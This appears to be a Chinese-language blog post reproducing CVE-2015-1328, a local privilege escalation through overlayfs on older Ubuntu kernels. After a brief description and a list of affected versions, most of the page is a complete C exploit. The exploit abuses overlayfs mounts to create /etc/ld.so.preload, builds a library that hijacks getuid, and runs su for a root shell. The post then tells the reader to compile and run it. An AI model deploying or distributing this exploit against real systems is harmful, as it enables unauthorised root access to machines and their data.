(CVE-2015-1328)Ubuntu Linux内核本地提权漏洞

(CVE-2015-1328)Ubuntu Linux内核本地提权漏洞

一、漏洞简介

本地普通用户可以利用该漏洞在敏感系统目录中创建新文件或读取敏感文件内容,从而提升到管理员权限。

二、漏洞影响

Ubuntu 12.04,14.04,14.10,15.04 (内核 Kernel 3.13.0 < 3.19

三、复现过程

  • 查看Ubuntu版本与内核

    (CVE-2015-1328)Ubuntu Linux内核本地提权漏洞

    均在漏洞影响范围内,下载并编译poc

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sched.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <sched.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    #include <sys/mount.h>
    #include <sys/types.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <linux/sched.h>
    
    #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
    
    static char child_stack[1024*1024];
    
    static int
    child_exec(void *stuff)
    {
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
    
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
    // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
    fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
    exit(-1);
    }
    file = ".access";
    chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
    
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
    
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
    if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
    exit(-1);
    }
    chmod("/tmp/ns_sploit/work/work",0777);
    }
    
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
    }
    
    int
    main(int argc, char **argv)
    {
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
    
    fprintf(stderr,"spawning threads\n");
    
    if((wrapper = fork()) == 0) {
    if(unshare(CLONE_NEWUSER) != 0)
    fprintf(stderr, "failed to create new user namespace\n");
    
    if((init = fork()) == 0) {
    pid_t pid =
    clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
    if(pid < 0) {
    fprintf(stderr, "failed to create new mount namespace\n");
    exit(-1);
    }
    
    waitpid(pid, &status, 0);
    
    }
    
    waitpid(init, &status, 0);
    return 0;
    }
    
    usleep(300000);
    
    wait(NULL);
    
    fprintf(stderr,"child threads done\n");
    
    fd = open("/etc/ld.so.preload",O_WRONLY);
    
    if(fd == -1) {
    fprintf(stderr,"exploit failed\n");
    exit(-1);
    }
    
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
    fprintf(stderr,"couldn't create dynamic library\n");
    exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
    }
    
  • 编译poc 后直接运行获得权限

(CVE-2015-1328)Ubuntu Linux内核本地提权漏洞

上一篇:三个IO口控制四个LED灯


下一篇:大数据-HDFS 集群搭建的配置文件